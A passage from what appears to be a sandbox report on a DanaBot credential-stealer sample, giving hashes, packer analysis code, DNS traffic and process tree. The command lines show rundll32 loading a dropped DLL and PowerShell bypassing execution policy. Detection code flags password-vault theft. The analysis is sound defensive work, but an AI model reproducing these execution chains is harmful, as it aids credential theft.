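    for label, body in (("tmpD845", TMPD845), ("tmpA617", TMPA617), ("benign", BENIGN)):
        print(label, analyze_script(body))
```

tmpD845 scores 8 (all four credential indicators), tmpA617 scores 2 (temp-file redirect plus the nslookup probe) and the control scores 0. The weights are chosen so that the PasswordVault type name together with a Retrieve* call is sufficient on its own: an administrator has no routine reason to project that WinRT class into PowerShell, so that pair carries the verdict regardless of where the output goes.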

C:\Users\user\Desktop\X4XY5J~1.EXE.tmp
  Process: C:\Users\user\Desktop\X4xY5J1GWc.exe
  File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
  Category: dropped
  Size (bytes): 1382912
  Entropy (8bit): 6.689733051824877
  Encrypted: false
  SSDEEP: 24576:ocFXB/GJfdFoUB8dByM/CeA+XnF0T+Taa:7R/Bz35T
  MD5: 279FD5BE1EF6F78DCEAEA9160797D3CA
  SHA1: 02D83BB9752B2F9CB205FBBA5EF084069204CE5C
  SHA-256: 79E7F889F4D8C8475BEF4A94124FFCDC68D1B2F8B632A6F3539179945F481477
  SHA-512: 9459221CA625F4969CA4DBF68C9765F01B71D36B90CB5C0CEE863E764DA6C2FD2317581BDFDBFB0440133ED3435B90516EA36E06B20EFD1267CA22BFE34BB216
  Malicious: true
  Yara Hits: Rule: JoeSecurity_DanaBot_stealer_dll_1, Description: Yara detected DanaBot stealer dll, Source: C:\Users\user\Desktop\X4XY5J~1.EXE.tmp, Author: Joe Security
  Antivirus: ReversingLabs, Detection: 33%
  Preview: MZP...... @...... !..L.!..This program must be run under Win32..$7...... PE..L.....`...... `...... y...... @...... `...... 0...... D...... ,e...... text....U...... V...... `.itext...... p...... Z...... `.data...... d...... @....bss.....^...... idata...... `...... @....didata...... @....edata...... @[email protected]...... @[email protected]...... @..B.rsrc....0...... 0...... @..@...... @..@......

C:\Users\user\Documents\20210725\PowerShell_transcript.116938.swg8lo9M.20210725082922.txt
  Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
  Category: dropped
  Size (bytes): 1046
  Entropy (8bit): 5.145314916127269
  Encrypted: false
  SSDEEP: 24:BxSAld0i7vBVLSx2DOXUWQa1WXHjeTKKjX4CIym1ZJXtC3nxSAZL:BZLFvTLSoO1cXqDYB1ZeXZZL
  MD5: 196282E968E31CFFB2EB0DBBDAC59BAE
  SHA1: F036898E810D904ED7C70CB841EFB210C54E9CE4
  SHA-256: B3C57C5D6D16D1DBD9D3BC29795B2867F5CFB801AAAF6F784E8BE9B6A79302F8
  SHA-512: DBC487B9FACA9A0CC396F8CB77A20E5F4E10F9A8FDC29DA356E069445D0426619E642495D3CF3C35CAD50D0C095614C0410A3429F1DD91D454D350A0F74A627C
  Malicious: false
  Preview:
    **********************
    Windows PowerShell transcript start
    Start time: 20210725082943
    Username: computer\user
    RunAs User: computer\user
    Configuration Name:
    Machine: 116938 ( NT 10.0.17134.0)
    Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Executionpolicy bypass -File C:\Users\user\AppData\Local\Temp\tmpD845.tmp.ps1
    Process ID: 6764
    PSVersion: 5.1.17134.1
    PSEdition: Desktop
    PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
    BuildVersion: 10.0.17134.1
    CLRVersion: 4.0.30319.42000
    WSManStackVersion: 3.0
    PSRemotingProtocolVersion: 2.3
    SerializationVersion: 1.1.0.1
    **********************
    **********************
    Command start time: 20210725082948
    **********************
    PS>CommandInvocation(tmpD845.tmp.ps1): "tmpD845.tmp.ps1"
    **********************
    Command start time: 20210725083325
    **********************
    PS>$global:?
    True
    **********************
    Windows PowerShell transcript end
    End

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.8587976700533515
TrID:
  Win32 Executable (generic) a (10002005/4) 99.94%
  Clipper DOS Executable (2020/12) 0.02%
  Generic Win/DOS Executable (2004/3) 0.02%
  DOS Executable Generic (2002/1) 0.02%
  VXD Driver (31/22) 0.00%
File name: X4xY5J1GWc.exe
File size: 1149952
MD5: ab4cf6181cfb102ec86c66d56af2d229
SHA1: ac756cbff2887e804e9957898b0d6450a33a0aa1
SHA256: f7c566ca7413a1259a7bcc120bc431a5ad129438b1e8b9b51c398d5eecfc51a5
SHA512: dec2910e395b1714966c85741f1062f6a4b62a9a1ab3f8f92c573a2b44a49ced2a963f383247b871eb90ec7cc795a4226dc0944b8bce3e74bb3f5bd2024b0a2f
SSDEEP: 24576:RtrUusPn8AAsDdRY+KBXRLR6YD1kl6YfaWAy0BPA:RtvsP9JRY+KBB96YKIsFn0BI
File Content Preview: MZ...... @...... !..L.!This program cannot be run in DOS mode....$...... PE..L...~ ..^...... @....I....

File Icon

Icon Hash: e0e0e8beb0e4c8ea

Static PE Info

General

Entrypoint: 0x4ec9e7
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp: 0x5EAB2E7E [Thu Apr 30 20:01:02 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 7674305f35b9aa8841472231e8903dc3

Entrypoint Preview

Data Directories

Sections

Name   Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text  0x1000           0xf3eb2       0xf4000   False     0.980420722336   data       7.9914516517   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data  0xf5000          0x46b260      0x3c00    unknown   unknown          unknown    unknown        IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls   0x561000         0xff5         0x1000    False     0.00634765625    data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc  0x562000         0x1fb78       0x1fc00   False     0.644100639764   data       6.46977992651  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
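The section table is where the two "Detected unpacking" signatures can be checked by hand: .text has entropy 7.99 against a maximum of 8.0 for byte data, and .data declares a virtual size of 0x46b260 bytes backed by only 0x3c00 bytes on disk, so the loader reserves roughly 4.6 MB that is empty in the file and gets filled at run time. The Python below is an added example, not Joe Sandbox's analysis code, that computes the same entropy measure and applies those checks to section records transcribed from this table. The thresholds (7.5 bits, a 4x size ratio with a 64 KiB minimum gap) and the shortened flag names are the example's own choices.

```python
import math
from collections import Counter

# Section records transcribed from the section table above (constructed dicts;
# flag names are IMAGE_SCN_* with the prefix dropped). .data has no entropy in
# the report because only 0x3c00 bytes of it exist on disk.
SECTIONS = [
    {"name": ".text", "va": 0x1000,   "vsize": 0xf3eb2,  "raw": 0xf4000, "entropy": 7.9914516517,  "flags": {"EXECUTE", "CODE", "READ"}},
    {"name": ".data", "va": 0xf5000,  "vsize": 0x46b260, "raw": 0x3c00,  "entropy": None,          "flags": {"INITIALIZED_DATA", "WRITE", "READ"}},
    {"name": ".tls",  "va": 0x561000, "vsize": 0xff5,    "raw": 0x1000,  "entropy": 0.0,           "flags": {"INITIALIZED_DATA", "WRITE", "READ"}},
    {"name": ".rsrc", "va": 0x562000, "vsize": 0x1fb78,  "raw": 0x1fc00, "entropy": 6.46977992651, "flags": {"INITIALIZED_DATA", "READ"}},
]
IMAGE_BASE = 0x400000
ENTRY_POINT = 0x4ec9e7  # from Static PE Info above

HIGH_ENTROPY = 7.5  # example threshold: compressed or encrypted code usually sits above this


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, the measure behind the report's Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def assess_sections(sections: list, entry_va: int, image_base: int) -> list:
    """Return (section, reason) pairs for the packer indicators checked first in triage."""
    findings = []
    for s in sections:
        if "EXECUTE" in s["flags"] and s["entropy"] is not None and s["entropy"] >= HIGH_ENTROPY:
            findings.append((s["name"], "executable section with near-random entropy (packed or encrypted code)"))
        # Virtual size far above raw size: memory the loader zero-fills and the
        # program populates itself, which is where an unpacking stub writes the payload.
        if s["vsize"] >= 4 * s["raw"] and s["vsize"] - s["raw"] >= 0x10000:
            findings.append((s["name"], "virtual size far exceeds raw size (room for code written at run time)"))
        if {"EXECUTE", "WRITE"} <= s["flags"]:
            findings.append((s["name"], "section is both writable and executable"))
    rva = entry_va - image_base
    owner = next((s for s in sections if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw"])), None)
    if owner is None:
        findings.append(("entrypoint", "entry point lies outside every section"))
    elif "EXECUTE" not in owner["flags"]:
        findings.append((owner["name"], "entry point lies in a non-executable section"))
    return findings


if __name__ == "__main__":
    for name, reason in assess_sections(SECTIONS, ENTRY_POINT, IMAGE_BASE):
        print(f"{name}: {reason}")
```

On this table the function reports exactly the two indicators the signatures are built on: .text for entropy and .data for the inflated virtual size. The entry point (RVA 0xec9e7) resolves to .text, and no section is writable and executable at the same time, which fits a packer that changes section protections at run time (the first "Detected unpacking" signature) rather than one that ships a W+X section.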

Resources

Imports

Version Infos

Possible Origin

Language of compilation system  Country where language is spoken
Croatian                        Croatia

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                  Type                  Class
Jul 25, 2021 08:30:25.298599005 CEST  192.168.2.6  8.8.8.8  0x1       Standard query (0)  8.8.8.8.in-addr.arpa  PTR (Pointer record)  IN (0x0001)
Jul 25, 2021 08:30:25.329036951 CEST  192.168.2.6  8.8.8.8  0x2       Standard query (0)  localhost             255                   IN (0x0001)

Both queries are the traffic of the nslookup.exe -type=any localhost command in tmpA617.tmp.ps1, which powershell.exe PID 5484 started at 08:30:11: nslookup first reverse-resolves its server to print its name (the PTR query for 8.8.8.8), then sends the ANY (type 255) query for localhost.

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                  CName  Address  Type                  Class
Jul 25, 2021 08:30:25.326927900 CEST  8.8.8.8    192.168.2.6  0x1       No error (0)    8.8.8.8.in-addr.arpa                  PTR (Pointer record)  IN (0x0001)
Jul 25, 2021 08:30:25.365447044 CEST  8.8.8.8    192.168.2.6  0x2       Name error (3)  localhost             none   none     255                   IN (0x0001)

Code Manipulations

Statistics

Behavior


System Behavior

Analysis Process: X4xY5J1GWc.exe PID: 6644 Parent PID: 5920

General

Start time: 08:28:19
Start date: 25/07/2021
Path: C:\Users\user\Desktop\X4xY5J1GWc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\X4xY5J1GWc.exe'
Imagebase: 0x400000
File size: 1149952 bytes
MD5 hash: AB4CF6181CFB102EC86C66D56AF2D229
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low

File Activities

File Created

File Written

Analysis Process: rundll32.exe PID: 6712 Parent PID: 6644

General

Start time: 08:28:22
Start date: 25/07/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\X4XY5J~1.TMP,S C:\Users\user\Desktop\X4XY5J~1.EXE
Imagebase: 0x3a0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: high

File Activities

Analysis Process: rundll32.exe PID: 7140 Parent PID: 6712

General

Start time: 08:28:50
Start date: 25/07/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\RUNDLL32.EXE C:\Users\user\Desktop\X4XY5J~1.TMP,Z0sc
Imagebase: 0x3a0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: high

File Activities

File Created

File Written

File Read

Registry Activities

Key Value Created

Key Value Modified

Analysis Process: powershell.exe PID: 6764 Parent PID: 7140

General

Start time: 08:29:18
Start date: 25/07/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Executionpolicy bypass -File 'C:\Users\user\AppData\Local\Temp\tmpD845.tmp.ps1'
Imagebase: 0xd30000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

File Activities

File Created

File Deleted

File Written

File Read

Analysis Process: conhost.exe PID: 6568 Parent PID: 6764

General

Start time: 08:29:19
Start date: 25/07/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: powershell.exe PID: 5484 Parent PID: 7140

General

Start time: 08:30:11
Start date: 25/07/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Executionpolicy bypass -File 'C:\Users\user\AppData\Local\Temp\tmpA617.tmp.ps1'
Imagebase: 0xd30000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

File Activities

File Created

File Read

Analysis Process: conhost.exe PID: 5548 Parent PID: 5484

General

Start time: 08:30:12
Start date: 25/07/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis

Copyright Joe Security LLC Joe Sandbox Cloud Basic 33.0.0 White Diamond
